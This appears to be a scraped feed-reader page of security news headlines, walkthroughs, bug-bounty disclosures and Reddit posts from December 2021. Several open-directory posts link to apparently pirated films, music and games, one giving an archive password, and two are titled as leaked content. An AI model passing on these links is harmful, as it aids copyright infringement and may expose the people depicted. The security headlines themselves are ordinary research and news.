    From zero to one: a deep dive into the log4j2 JNDI RCE vulnerability CVE-2021-44228
    By introducing the Java logging ecosystem and analyzing the log4j2 source code, this takes you deep into the internet's heavyweight "nuclear bomb" vulnerability.  ( 2 min )

    How Intrusion Prevention Systems (IPS) Work in Firewall
    Intrusion prevention and the firewall are part of Network Threat Protection. As of version 14, Network Threat Protection and Memory…  ( 5 min )
    Backdoor: HackTheBox Walkthrough
    Welcome back! Today we are going to solve another machine from HacktheBox. The box is listed as an easy box. Just add backdoor.htb in… Continue reading on InfoSec Write-ups »  ( 5 min )

    Untitled
    VK.com disclosed a bug submitted by azimoff: https://hackerone.com/reports/1300583 - Bounty: $300
    Bot setting information leakage in OpenChat room
    LINE disclosed a bug submitted by akichia: https://hackerone.com/reports/1305432 - Bounty: $200
    Access to images and videos in drafts on LINE BLOG
    LINE disclosed a bug submitted by akichia: https://hackerone.com/reports/1290170 - Bounty: $780
    Missing authentication in buddy group API of LINE TIMELINE
    LINE disclosed a bug submitted by e26174222: https://hackerone.com/reports/1283938 - Bounty: $3000
    See drafts and post articles if the account owner hasn't set password (livedoor CMS plugin)
    LINE disclosed a bug submitted by akichia: https://hackerone.com/reports/1278881 - Bounty: $1300
    Missing ownership check in 2FA for secondary client login
    LINE disclosed a bug submitted by shi0n: https://hackerone.com/reports/1250474 - Bounty: $7500
    Developer uploaded files missing authentication on LINE GAME Developers site(gdc.game.line.me)
    LINE disclosed a bug submitted by tosun: https://hackerone.com/reports/969605 - Bounty: $1000
    Password reset by malicious input on air.line.me
    LINE disclosed a bug submitted by tosun: https://hackerone.com/reports/968742 - Bounty: $500
    LINE Profile ID leaks in OpenChat
    LINE disclosed a bug submitted by 66ed3gs: https://hackerone.com/reports/927338 - Bounty: $3000


    ZAP's new Import/Export add-on, and my speculation about its future
    Recently, various import and save related features in ZAP were consolidated into a new add-on named "Import/Export". Nothing changed in the user interface, so not much is different, but it gives a glimpse of where ZAP's import/export features are headed, so I'm writing about it 😎 Import files containing URLs Log File Importer Save Raw Message Save XML Message The actual add-on name of the newly added Import/Export is exim. EXIM stands for EXport & IMport, a term widely used on the web with the same meaning. ZAP add-ons are more or less required to provide an API, so exim is also provided as an API.
    Let's scan for Web Cache vulnerabilities 🔭
    Web cache related vulnerabilities such as Web Cache Poisoning and Web Cache Deception are fairly old techniques, but they seem to have developed rapidly over the past few years thanks to researchers at Portswigger such as albinowax (@albinowax). These vulnerabilities are identified and exploited through various testing methods, but until now there has been no tool I considered truly powerful. (Burp Suite's built-in scanner is about the only one…) Today I want to share a good tool that can quickly identify web cache vulnerabilities! In fact, I had been very slowly building a related tool since this summer (around June 2021), but Hackmanit beat me to it.

    Various stuff - mostly photos
    submitted by /u/Pleasant_Jelly_8397 [link] [comments]
    Music
    submitted by /u/International_Milk_1 [link] [comments]
    A nice list of movies, and older tv series such as Mannix
    submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    1.19TB of documentaries, many with subtitles (repost from January 2019)
    submitted by /u/Throw10111021 [link] [comments]  ( 1 min )
    "Poetry for the Beat Generation" plus some jazz albums (flac)
    Finally found "Poetry for the Beat Generation" with Allen on piano and Kerouac reciting http://109.120.203.163/Music/Acid%20jazz/ submitted by /u/SexRevolutionnow [link] [comments]
    Music which was pasted before, but at different link
    submitted by /u/International_Milk_1 [link] [comments]
    Movies and tv shows. But it's a mixture of those which are dubbed in persian/iranian with no english audio option, and those with english language soundtrack and persian/iranian subs. But subs can be turned off. Speed is so so I guess.
    submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    XSPF VLC Playlist of movies I found here
    Please delete if not allowed. Hi guys, a while ago I made a quick and easy browser tool to convert links into a VLC playlist. You might be wondering why I opted out of M3U playlists; honestly, for future expansion: M3U playlists tend to be pretty simple on the spec and can't define much, while XSPF allows for things like duration setting. It is a goal to rewrite this eventually and figure out a way of showing the duration, probably using an API of some kind. (my tool: https://csmit195.github.io/Links-to-XSPF-Web-App/) I have two files, one is 14.1k movies, and the other is 4.1k movies. My PC is fairly fast and loading the 14.1k movies took about 3 mins, while the 4.1k only takes 10 secs. Please test carefully with the 14.1k, some PCs might fail to load it, VLC could crash b4 it finishes loading. Downloads: note: the top 1.1k movies of both files are more popular than the ones below it 14.1K Movies (4.1K Movies from below included) https://drive.google.com/file/d/1gSjguuPTTyP_2oVktKD_YqbaAZStpEu4/view?usp=sharing 4.1K Movies https://drive.google.com/file/d/1dSb3d_CDbsvR7UO8nnnDBdYmJmsuBPv2/view?usp=sharing If you want more or have a really good source of direct movie links, feel free to lmk and I'll create more playlists. For now, enjoy and would love feedback (please no code reviews, I made it quickly so I can achieve this goal, wasn't really built for production, I'd love to optimise it in the future tho). Cheers, Chris submitted by /u/csmit195 [link] [comments]  ( 2 min )

    A capability-safe language would have minimized the Log4j vulnerability
    Article URL: https://justinpombrio.net/2021/12/26/preventing-log4j-with-capabilities.html Comments URL: https://news.ycombinator.com/item?id=29696318 Points: 94 # Comments: 142  ( 6 min )

    Abeats Bounty Program
    Aiming to test the website's usability, the bounty program is ideal for gathering engagement from the community and finding the necessary… Continue reading on Medium »  ( 1 min )
    CVE-2021–40579
    Insecure direct object references (IDOR) Continue reading on Medium »  ( 1 min )
    Passive Information Gathering for Pentesting
    Information gathering is very important for a pentester. Continue reading on Medium »  ( 2 min )

    How do I start with Netsec ?
    I am currently enrolled in a computer science degree and asked myself what I want to do with it. I often found myself at one field: Security. However, I have no clue on how or where to start learning more about the field. For example, I find pentesting especially interesting and searched for ways to get into the field. I found two ideologies for that, one being hands-on experience and the other being strong basics. However, that only gave me more questions. First: what is "hands-on experience"? Do I have to hack my own laptop or crack my neighbors' Wifi password? Or is it much simpler to get experience? Second: basics of what? How a computer works? The different protocols of the internet? And also, how do I get strong basics? Where do I even start? submitted by /u/CallMeNepNep [link] [comments]  ( 2 min )

    SecWiki News 2021-12-26 Review
    gosint open-sourced by ourren. For more of the latest articles, visit SecWiki  ( 2 min )

    Cracked5pider/KaynLdr: KaynLdr is a Reflective Loader written in C/ASM
    submitted by /u/dmchell [link] [comments]

    FreeBuf Morning Report | Some apps still obtain user information after all permissions are denied; pirated copies of Spider-Man contain malicious programs
    Some pirated copies of Spider-Man: No Way Home contain trojans or bundled malware, and some even include cryptomining programs.  ( 1 min )

    Advent of Cyber 3 Day 16 - Ransomware Madness Walkthrough
    You are the responding intelligence officer on the hunt for more information about the infamous “Grinch Enterprises” ransomware gang.  As… Continue reading on Medium »  ( 2 min )
    Log4Shell — You should know about it.
    Hello everyone! Continue reading on Medium »

    What Is a Watering Hole Attack and How to Prevent Them
    submitted by /u/bee925p [link] [comments]  ( 1 min )

    CTF Write-Up: Ether
    CTF challenge available at ctf-mystiko.com. Continue reading on Medium »  ( 1 min )

    Weaponize JScript to bypass Windows Defender
    To gain initial access during a Red Team Engagement, Phishing might be a valid option. Continue reading on Medium »  ( 3 min )

    Accessing data in suspect disk
    After copying with a write blocker, how do investigators access data in an encrypted drive? Do they have to break the encryption password with powerful servers, or are there other methods? submitted by /u/thecirclingfly [link] [comments]  ( 2 min )


    Join Synack Red Team
    Hi, how to join synack after finishing HTB track submitted by /u/0xA1MN [link] [comments]
    Stay organized with your pentesting knowledge
    Hi, I am not a professional, I just love pentesting/CTF stuff and I discover new things every day, thanks to HackTheBox, TryHackMe and other platforms. I would like to collect all my knowledge online, let's say a webpage with a step-by-step methodology: information gathering, scanning, searching for vulnerabilities and so on. I would like to put up "cheatsheets" for useful commands like nmap, dirbuster, sqlmap... I tried a simple blog with WordPress, but I'm wondering if you use something better (GitHub)? Thank you. submitted by /u/g-simon [link] [comments]  ( 2 min )
    Firewall+IPS hardware recommendations for a home LAN setup
    Hi All, I'm planning to play around with some firewall distros that have IPS/Suricata enabled. Target environment is a SOHO with around 10 people, not hosting any web servers or whatnot. Any hardware recommendations, particularly on the CPU and RAM? Is a Pentium Gold G6400 (2 cores, 4 threads) and 4GB RAM good enough? I read somewhere that CPU (# of cores) carries more weight than RAM, IPS-wise. Would it make sense to use AMD processors instead? Wouldn't the GPU cores just go to waste on a firewall/IPS? tia submitted by /u/albertcuy [link] [comments]  ( 1 min )
    How secure is it to stay logged into a site?
    Say you stay logged into an email or social media site, is there any risk in doing so? submitted by /u/RaZdoT [link] [comments]  ( 1 min )
    How secure is Netgear RAX45 VPN with Remote Desktop?
    I turned on VPN in router settings, which uses OpenVPN, and successfully set up a Remote Desktop, using OpenVPN Client and Remote Desktop for windows 10. Wanted to ask: - how secure is this setup? - is there a better way to have a cheap and personal/small business secure Remote Desktop with VPN? submitted by /u/WiseMan9000 [link] [comments]  ( 1 min )

    Smallish list of older movies. Nothing after 1972. Some good stuff here.
    submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    Animation with audio options for English or Farsi, according to the few I checked (slow, though)
    submitted by /u/International_Milk_1 [link] [comments]

    From learning about DongTai IAST to joining the open-source community
    As a member of the company's information security department, ensuring the application security of every business line is part of my job, so how do I fulfil this mission?  ( 1 min )
    Writing an Xposed module from 0 to 1: Anti Screenshot
    A rookie's road to screenshots  ( 1 min )
    Abaddon: an augmentation tool designed for red team researchers
    Abaddon aims to help red team researchers improve operational efficiency and perform certain repetitive operations faster and more stealthily.  ( 1 min )

    HOW I Found 17 Critical and Medium Security Bugs on INDUSIND Bank
    Hi, everyone Continue reading on Medium »  ( 3 min )
    How I got access to Maxlifeinsurance insurance company's AWS metadata by SSRF
    Hi, everyone Continue reading on Medium »  ( 3 min )
    Jerry From Hackthebox
    Hello everyone I am HAC and Today we will be doing jerry from Hackthebox Continue reading on Medium »  ( 2 min )
    Massive Users Account Takeovers(Chaining Vulnerabilities to IDOR)
    Hello hunters 👋✌ this is my 7th writeup 🧾, Continue reading on Medium »  ( 2 min )
    SQL Injection — 1st Dose
    An Injection that is not used for treatment! Continue reading on Medium »  ( 2 min )
    Information Disclosure leads to sensitive credential($$$)
    Hi Hackers, hope you are fine. My name is Khan Mamun (white hat hacker). This is my 3rd write up. Continue reading on Medium »  ( 2 min )

    SecWiki News 2021-12-25 Review
    No news updated today. For more of the latest articles, visit SecWiki  ( 2 min )

    I found (and fixed) a vulnerability in Python
    Article URL: https://tldr.engineering/how-i-found-and-fixed-a-vulnerability-in-python/ Comments URL: https://news.ycombinator.com/item?id=29683853 Points: 3 # Comments: 0  ( 2 min )

    Router Management Practices: Web, App, and forcing to associate user home network with a vendor account
    submitted by /u/wkwrd [link] [comments]
    Make Your PC Notify Your Phone Whenever There Is Movement Around It
    submitted by /u/MagicianPutrid5245 [link] [comments]  ( 1 min )

    Empire: LupinOne Vulnhub Walkthrough
    Empire: LupinOne is a Vulnhub easy-medium machine designed by icex64 and Empire Cybersecurity. This lab is appropriate for seasoned CTF players who want to put The post Empire: LupinOne Vulnhub Walkthrough appeared first on Hacking Articles.  ( 6 min )

    CaseVegas Walkthrough — Cyberdefenders
    Challenge: CaseVegas Continue reading on Medium »  ( 7 min )

    Forensic Courses
    Took the video lectures from EC-Council CHFI. But it did not teach me how to use tools or real world data, just the theory. Can you suggest a course/resource/links that teach you how to use forensic tools with real world scenarios? submitted by /u/thecirclingfly [link] [comments]  ( 1 min )
    A bit of amateur detective work
    Hi all, I am looking at some student submissions of Word 2010 docs. I suspect the time stamp has been changed in some way. Is there a way to verify it beyond just looking at the Word doc's properties? submitted by /u/HelloAmes [link] [comments]  ( 2 min )

    Dalfox 2.7 Released 🎉
    Hi hackers! Dalfox v2.7 has been released 🎉🎉🎉 There are not many added features this release. But it's better than before, so I recommend an update! Then let's start the review, and have a great holiday 🧑🏼‍🎄 Thank you ❤️ First, thank you so much to all contributors!! Thanks to you, this project is getting better and better. Thank you always! Release note Github | DockerHub Add BAV Module ESI Injection Support to windows/arm64 Upgrade go dependency (1.


    I set up MAC address filtering but there are still unrecognized devices on my network. Is this normal?
    I recently set up MAC address filtering (white-list/allow-list) to only allow certain devices to connect to my network. However, when I check connected devices, I still see two devices that I don't recognize and they are not in my allow-list. How are they connecting to the network? I tested the MAC address filtering with my phone temporarily removing it from the list, and the filter worked. So I am confused why those two devices are not blocked. For what it's worth, both devices are showing as "Espressif Inc" and are probably part of my smart devices, so I am not too concerned about them. However, I would still like to understand why they are not being blocked by the filter. submitted by /u/ultrakawaii [link] [comments]  ( 1 min )
    Identifying SSL/TLS dependencies
    Hello, it may look like a noob question but it's my first job and... We have servers on which weak SSL/TLS versions are running. So I have spoken with the server owners and checked on which port their usage has been detected. At the end of the investigation, I had determined that it was OK if I disabled TLS 1.0 and 1.1. But this was a mistake and one of our important applications couldn't communicate anymore with our SQL server. In the panic I reversed all of my changes. And now I'm afraid of trying to patch these issues. So what is the best way to detect the usage of SSL/TLS? Should I sniff every server with Wireshark or something else? Thank you all submitted by /u/Low_Lettuce_8933 [link] [comments]  ( 2 min )
    How to view the exploit code of metasploit's auxiliary or exploits?
    I've been trying to get a shell with an SMB exploit but I think it uses some kind of buffer overflow scheme. Is there any way to see the exploit [code] behind Metasploit exploits? Here's the exploit I've been trying to use: exploit/windows/smb/ms17_010_eternalblue submitted by /u/The_Intellectualist [link] [comments]  ( 1 min )

    Threat in Lunar Client?? java.trojan.genericgba.30921
    Hello, I recently did an analysis with Bitdefender and it detected this threat: java.trojan.genericgba.30921. I looked for this name on the internet but nothing came up. The strange thing is that the threat was detected in a Lunar Client folder (a Minecraft client) and also in a Minecraft mod (Geyser). This seems very strange to me because according to Lunar Client and the Geyser mod it is safe. Does someone here have an answer to why it is detected as a threat? submitted by /u/QuirkyCod4995 [link] [comments]  ( 1 min )
    About work fields (investigation, private market etc).
    I'm 18 and I'm from Brazil. I'm currently studying Computer Science. Some things led me to become interested in computer forensics these past months, and I'm interested in following this career. Since here in Brazil you first need a CS degree to do a computer forensics course, I'm focused on finishing my CS course first for now. I looked at the FAQ here and got a lot of useful information, but I still have one question that wasn't answered: what are the fields you can work in? I know you can work in law enforcement and do forensic analysis to find digital evidence of a suspect (which is most cases I believe), but can you work in the investigation field (like tracing criminals online)? If not, how do I work in this investigation field related to online crimes? Is computer forensics the best thing to study in this case? Another question is: in the private work field, how does it work? Do you work with data recovery stuff? I hope I don't annoy you with those questions, but I couldn't find them here yet! submitted by /u/silva-txt [link] [comments]  ( 1 min )
    Timeline
    Hi, is there a way in Excel or other software to put in a list of phone calls with their dates and times and get a timeline that shows how many calls were made to the same phone, or to the same phone by date and time? Thanks in advance. submitted by /u/joshmaidom [link] [comments]  ( 1 min )
    ?? After seizing an Android 10, should keep charging battery ??
    There may be weeks before digital forensic people come to examine the Android 10 phone with an unknown passcode. It was in use when seized, but later auto-locked. Pls help: (1) Should I keep it powered on and keep charging it, since the battery cannot last for weeks? (2) Would it be harder to unlock or retrieve data if I let it power down and then switch it on later? submitted by /u/Just_Drama5668 [link] [comments]  ( 2 min )

    Joni Mitchell albums
    submitted by /u/International_Milk_1 [link] [comments]
    Clifford D Simak reading City
    submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    Hmm. Some music, but other types of audio (see comment)
    submitted by /u/International_Milk_1 [link] [comments]
    Tons of pirated video games
    Hi, I use this website for repack DDLs http://s5.gamingmaster.ir it has a home page too http://gamingmaster.ir archives password: gamingmaster.ir submitted by /u/develhoper [link] [comments]  ( 1 min )
    movies, korean tv dramas, tv series, etc etc (some txts in english, some in korean-same with content-no english subs for korean dramas)
    submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    movies, tv shows, music, manga, etc etc (slow speeds)
    submitted by /u/International_Milk_1 [link] [comments]
    music for ringtones
    submitted by /u/International_Milk_1 [link] [comments]
    one very small music list (at least in open directory format-see below) , and 1 very small movie list, with slow speeds.
    The movie one: Index of / The music one: Index of /Directos/ (ladiscoteca.net) If you go to the parent directory, there is a lot more stuff divided into years, genres etc etc. There is a radio player if you scroll down. Maybe someone else can do a better job of explaining it than me. Although it is not in open directory format. So if you just want to stream, it's good. I think the sound is great though. The one hit wonders is a nice one. submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    Anything you want here is for free
    Download limit exceeded for Main drive now 😔 limit resets at 2021-12-25 at 00:00:00 UTC. https://premiuim.rahuljayant.workers.dev/0:/ Edit - You can search from the hamburger menu - For username and password for 18+ from Drop down menu DM , otherwise post will be labelled as NSFW. submitted by /u/rahuljayant1 [link] [comments]  ( 2 min )
    Documentation for classic computers
    submitted by /u/Pleasant_Jelly_8397 [link] [comments]
    documentary type shows
    https://archive.org/download/pbsnovadocs https://davfl70.org/~davflsev/movies/WWI/ https://ir2.papionvod.ir/Media/Series/Terra%20Nova/Season%201/ http://flixhub.net/Data/Disk3/English%20Tv%20Serise/Planet%20Earth/Season%2001/ https://archive.org/download/Cops-Seasons-1-33-Cops-Reloaded https://archive.org/download/DocuCollection_201702 https://archive.org/download/InsideTheAmericanMobS01E06EndGame 2nd and 3rd links have a ton in their parent directories and 4th is from the most recent post here, sorry for that repost but i figured it id save someone the time of scrounging thru submitted by /u/ohimjustakid [link] [comments]  ( 1 min )
    science fiction and fantasy folk music (small selection)
    submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    movies
    submitted by /u/International_Milk_1 [link] [comments]

    How to exploit Log4j vulnerabilities in VMWare…
    submitted by /u/digicat [link] [comments]  ( 1 min )

    Hunting down spider-man using Sherlock
    Ever wondered how to get the social media links of your favorite Marvel superheroes or, for that matter, anyone else's online social presence? Continue reading on Medium »  ( 1 min )
    Your Stalker Wants Your Outlet
    As crazy as it may sound, your stalker is looking for any possible clue in your photos to get a general idea of where you’re located and… Continue reading on Medium »  ( 1 min )

    Micropatching “Ms-Officecmd” Remote Code Execution (No CVE)
    Article URL: https://blog.0patch.com/2021/12/micropatching-ms-officecmd-remote-code.html Comments URL: https://news.ycombinator.com/item?id=29674988 Points: 3 # Comments: 0  ( 5 min )
    Where's the Interpreter? (CVE-2021-30853)
    Article URL: https://objective-see.com/blog/blog_0x6A.html Comments URL: https://news.ycombinator.com/item?id=29669026 Points: 3 # Comments: 0  ( 28 min )

    Free public Docker image vulnerability DB
    Article URL: https://dso.atomist.com/explore Comments URL: https://news.ycombinator.com/item?id=29674898 Points: 2 # Comments: 0
    ShortList: Log4j Vulnerability Tools
    Article URL: https://haydenjames.io/log4j-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=29673107 Points: 1 # Comments: 0  ( 4 min )
    Alberta MLA resigns after RCMP searches home after vulnerability report
    Article URL: https://www.cbc.ca/news/canada/edmonton/alberta-mla-thomas-dang-resigns-from-ndp-caucus-after-rcmp-searches-home-1.6294219 Comments URL: https://news.ycombinator.com/item?id=29670252 Points: 9 # Comments: 0  ( 2 min )

    SecWiki News 2021-12-24 Review
    Using CodeQL to analyze and hunt for the Log4j vulnerability by ourren; vulntarget vulnerability range series (2): vulntarget-b by ourren. For more of the latest articles, visit SecWiki

    Full Path Disclosure in WordPress REST API Response
    Showmax disclosed a bug submitted by fariqfgi: https://hackerone.com/reports/1358888 - Bounty: $50
    Xss At Shopify Email App
    Shopify disclosed a bug submitted by shaktiranjan867: https://hackerone.com/reports/1339356 - Bounty: $500
    Reflected XSS on dailydeals.mtn.co.za
    MTN Group disclosed a bug submitted by musab_alharany: https://hackerone.com/reports/1212235
    Reflected XSS at dailydeals.mtn.co.za
    MTN Group disclosed a bug submitted by musab_alharany: https://hackerone.com/reports/1210921

    Vibranium Debug Campaign
    Vibranium is pleased to announce the debug bounty campaign! Continue reading on Medium »  ( 2 min )
    Getting access to the Database of a Crypto Exchange using Google Dorks!
    Hello, Continue reading on Medium »  ( 2 min )
    Crema Bug Bounty Program Winners Announcement
    Continue reading on Medium »  ( 1 min )
    Install Nuclei on Kali Linux [Latest using go1.17]
    Nuclei : Vulnerability Scanner. Continue reading on Medium »  ( 1 min )
    Exposing Millions of Investor and Startup Register details and PII INFO in STARTUPINDIA (Govt of…
    Hi, everyone Continue reading on Medium »  ( 5 min )

    Cloud Security Breaches and Vulnerabilities: 2021 in Review
    submitted by /u/thorn42 [link] [comments]
    Blister malware can breach your devices in absolute stealth
    submitted by /u/IT_band [link] [comments]  ( 1 min )
    Log4PowerShell - A CVE-2021-44228 Proof of Concept / Demo I wrote in PowerShell
    submitted by /u/aalex954 [link] [comments]
  • Open

    Links Digest 2021
    What I am currently reading The following is a list of books that I am currently reading. I like to read several books simultaneously to have more options in case I am not ready to absorb specific content. Sapiens: A Brief History of Humankind by Yuval Noah Harari A Brief History of Time by Stephen Hawking How to avoid a climate disaster by Bill Gates The Ride of a Lifetime: Lessons in Creative Leadership from 15 Years as CEO of the Walt Disney by Robert Iger The Double Helix by James Watson Tao Te Ching by Lao Tzu Notes from the Underground by Fyodor Dostoyevsky What I've read The following is a list of books that I've read and recommend to others to read or browse through. This list is not complete and sorted in no particular order. Some books are better than others. One day I will provi…
    Links Digest 2021
    A short list of useful links. Security Blogs https://0x00sec.org/ - don't know yet but it looks interesting https://abiondo.me - ctf and other hacking things from a talented hacker https://www.vulnano.com/ - small blog but cool nevertheless https://bugbountyforum.com/ - interesting info about bug bounties https://xz.aliyun.com/ - interesting blog full of exploits and stuff https://sites.google.com/securifyinc.com/secblogs/table-of-contents - very cool research https://spaceraccoon.dev/ - bug bounty stuff https://samcurry.net - bug bounty stuff Zines https://www.alchemistowl.org/pocorgtfo/ - pocorgtfo https://secret.club - a zine but pretty compact and down to the point https://pagedout.institute/ - not sure yet Reference https://github.com/ngalongc/bug-bounty-reference https://cxsecurity.c…
  • Open

    Five cybersecurity predictions for 2022 and beyond
    Cybersecurity leaders currently face numerous challenges, and these will keep growing over the next few years.  ( 1 min )
    CVE-2021-31956 vulnerability analysis
    Overall the difficulty is low, making it a good entry point for beginners.  ( 1 min )
    FreeBuf enterprise-side group discussion | How should the value of enterprise security be measured?
    Someone compared security to the guardrails on both sides of a bridge: when nothing goes wrong nobody notices their value, yet without them nobody feels safe.
    IoT SAFE: strengthening the security of the IoT ecosystem
    There is light at the end of the tunnel.  ( 1 min )
    See you next year | The CIS 2021 Spring Edition topic preview livestream was a complete success
    This Christmas, I won't let you be alone, because FreeBuf Open Class is keeping you company. From December 21 to December 23 at 19:00 every evening, FreeBuf Open Class invited speakers from each forum of the conference to preview their topics live, joining 13 technical experts in the livestream room to discuss new cybersecurity technologies and trends with everyone. Without leaving home, get a head start on the highlights of each forum and interact closely with industry leaders; you won't be alone this Christmas. Over these three days of livestreams, guests from all walks of life brought the representatives and top performers among the broadest group of front-line cybersecurity workers a wealth of…  ( 1 min )
    Methods for intercepting Windows ALPC in the kernel
    ALPC is only a standard protocol; the specific content of each service, such as creating services, creating accounts, or searching system information, is different and must be decoded manually.  ( 2 min )
    What is a CDN? How does a CDN work?
    A CDN is a content delivery network built on top of the network, relying on edge servers deployed in various locations.
    Building a proactive vulnerability management system for critical information infrastructure based on vulnerability prioritization | World Information Security Conference
    A brief discussion of building a proactive vulnerability defense system for critical infrastructure.  ( 1 min )
    The "Work Guidelines for Reporting and Sharing Data Security Risk Information in the Industry and Information Technology Sector (Trial) (Draft for Comment)" have been released
    The Work Guidelines state that risk information reporting refers to the act of relevant organizations reporting data security risk information to the Ministry of Industry and Information Technology, local competent departments for industry and information technology, and local communications administrations.
    What information should we collect in web penetration testing?
    Know yourself and know your enemy, and you will never be defeated. One article explains how to maximize information gathering in the early phase of a penetration test.  ( 1 min )
    Because of rampant scams, VK, the "Russian WeChat", mandates two-factor authentication
    VK is finally introducing two-factor authentication and plans to make it mandatory for administrators of large communities in February 2022.  ( 1 min )
    Research shows credential stuffing attacks will surge over the Christmas period
    Research analysis found that credential stuffing incidents rose 56% during last year's Christmas and New Year shopping season, and up to 8 million attacks on consumers per day are expected over the same period in 2021.  ( 1 min )
    Reverse analysis tutorial (2): Base camp
    Reverse analysis tutorial (1): Debugging code. New debugging commands: I assume everyone has mastered the basic commands mentioned above through the hands-on practice in the previous article. Let's review them: F7, F8, Ctrl+F2, Ctrl+F9. If they seem unfamiliar, I suggest going back to relearn them, because today we are going to start learning about…  ( 1 min )
    FreeBuf Weekly | Classifieds site Gumtree leaks customer information; Hive ransomware is launching cyberattacks on a large scale
    We summarize and recommend this week's hot news, quality articles, and handy tools, so you won't miss any of this week's key points!  ( 1 min )
    Building a large-scale traffic data computing and analysis platform, and industry practice | A first look at the CIS 2021 Spring Edition conference topics
    Building a large-scale traffic-based data analysis platform can give enterprises more dynamic and precise marketing recommendations while safeguarding the data from a security standpoint.  ( 1 min )
    NVIDIA disclosed the applications affected by the Log4j vulnerability
    The Log4Shell vulnerability is being widely exploited in attacks worldwide.  ( 1 min )
  • Open

    [project]Bypass Firewalls using Various Evasion Techniques
    Bypass windows firewall using Nmap evasion techniques Continue reading on Medium »  ( 2 min )
  • Open

    SQL Injection JR. Pentester -TryHackMe Part 2
    Hi folks, welcome back to part 2 of SQL injection in JR. Pentester path.  ( 3 min )
    Identity Management Vulnerability Taxonomy v1.5
    I really like the OWASP list of vulnerabilities because it mostly stays at a uniform level of abstraction. Some issues are fairly… Continue reading on InfoSec Write-ups »  ( 4 min )
  • Open

    Tg pinay
    submitted by /u/kotsu0401 [link] [comments]
    TG pinay leaked
    submitted by /u/kotsu0401 [link] [comments]
    APK for music, movies etc etc
    submitted by /u/International_Milk_1 [link] [comments]
    Index of /library/
    Lots of pdf:es in all kind of subjects. http://erewhon.superkuh.com/library/ submitted by /u/CourseCalm [link] [comments]
    Several albums of deep-sea robot dives from Columbia University's climate school
    submitted by /u/HGMIV926 [link] [comments]  ( 1 min )
    Writing/Poetry Anthology Drafts
    submitted by /u/VeinyNotebook [link] [comments]
  • Open

    My smart TV has some sketchy ports open. Any clues?
    I captured some persistent host discovery traffic on my home WiFi network with Wireshark. There's never-ending activity in UDP and SSDP coming from this device. A basic nmap scan shows the following: Starting Nmap 7.80 ( https://nmap.org ) at 2021-12-23 18:37 -03 Initiating ARP Ping Scan at 18:37 Scanning 192.168.1.11 [1 port] Completed ARP Ping Scan at 18:37, 0.13s elapsed (1 total hosts) Initiating Parallel DNS resolution of 1 host. at 18:37 Completed Parallel DNS resolution of 1 host. at 18:37, 0.01s elapsed Initiating SYN Stealth Scan at 18:37 Scanning 192.168.1.11 [1000 ports] Discovered open port 8080/tcp on 192.168.1.11 Discovered open port 9001/tcp on 192.168.1.11 Discovered open port 9080/tcp on 192.168.1.11 Discovered open port 8002/tcp on 192.168.1.11 Discovered open port 8001/tcp on 192.168.1.11 Discovered open port 9000/tcp on 192.168.1.11 Completed SYN Stealth Scan at 18:37, 0.23s elapsed (1000 total ports) Nmap scan report for 192.168.1.11 Host is up, received arp-response (0.0058s latency). Scanned at 2021-12-23 18:37:29 -03 for 0s Not shown: 994 closed ports Reason: 994 resets PORT STATE SERVICE REASON 8001/tcp open vcom-tunnel syn-ack ttl 64 8002/tcp open teradataordbms syn-ack ttl 64 8080/tcp open http-proxy syn-ack ttl 64 9000/tcp open cslistener syn-ack ttl 64 9001/tcp open tor-orport syn-ack ttl 64 9080/tcp open glrpc syn-ack ttl 64 MAC Address: 8C:EA:48:XX:XX:XX (Unknown) Read data files from: /usr/bin/../share/nmap Nmap done: 1 IP address (1 host up) scanned in 0.50 seconds Raw packets sent: 1001 (44.028KB) | Rcvd: 1001 (40.052KB) It's just a Samsung smart TV. I'm really curious (maybe even concerned!?) about the service on port 9001. What could be going on? submitted by /u/EONRaider [link] [comments]  ( 3 min )
    gSuite login: Okta and VPN, or context aware access, which one is better?
    Hi there, I'm setting up gSuite and need some advice here. Use case requirements: operations team members will have access to customer data on Google Drive, so we want to force those team members to only view such data via the corporate VPN. Our sales team members do not have access to customer data, so we do not want them to log in via VPN because that's extra friction. ​ After researching online, I found two ways of doing this: a. Using the context aware access feature from gSuite https://support.google.com/a/answer/9275380?product_name=UnuFlow&hl=en&visit_id=637758886340041076-3475162686&rd=1&src=supportwidget0&hl=en Pro: setup seems straightforward, and can be configured based on teams Con: pay more per user, it's like $8 more per user over our current edition b. Set up gSuite to log in with Okta via SAML, and then configure Okta log on policies to require VPN for certain users https://support.google.com/a/answer/6369487?product_name=UnuFlow&hl=en&visit_id=637758886340041076-3475162686&rd=1&src=supportwidget0&hl=en#zippy=%2Csso-usernetwork-mapping-matrix Pro: Saves money, get more familiar with SAML which seems useful? Questions for experts here about this approach: Is it easy to quickly provision which users are required to log in via Okta and VPN? Anything we should be careful about? The process seems quite complicated. How much time will it take? Technically how is this different from option a? I guess gSuite does all the configuration automatically for you to save the time? ​ Which one would you advise us to go for? Any thoughts are tremendously appreciated! submitted by /u/johnestar [link] [comments]  ( 2 min )
    Is it possible to put SSO like Okta behind VPN?
    Hi there, I'm wondering if it is possible to put Okta behind a VPN. If employees are not connected to the company VPN, login via Okta should fail. How should I enable this? submitted by /u/johnestar [link] [comments]  ( 1 min )
    Threat Research
    I’m looking into getting into a threat research position and have a few questions: 1) average workload/what to expect 2) what certs/projects would help me get into a position like this 3) any advice from anyone in this type of role I currently do analyst/threat hunting work so I have some experience but hate my current job due to soc grind and burnout. I enjoy active defense topics like honeypots and I think a research role is better suited. MA and phishing analysis is always a fun time for me submitted by /u/blue_Kazoo82 [link] [comments]  ( 1 min )
    Home Networking
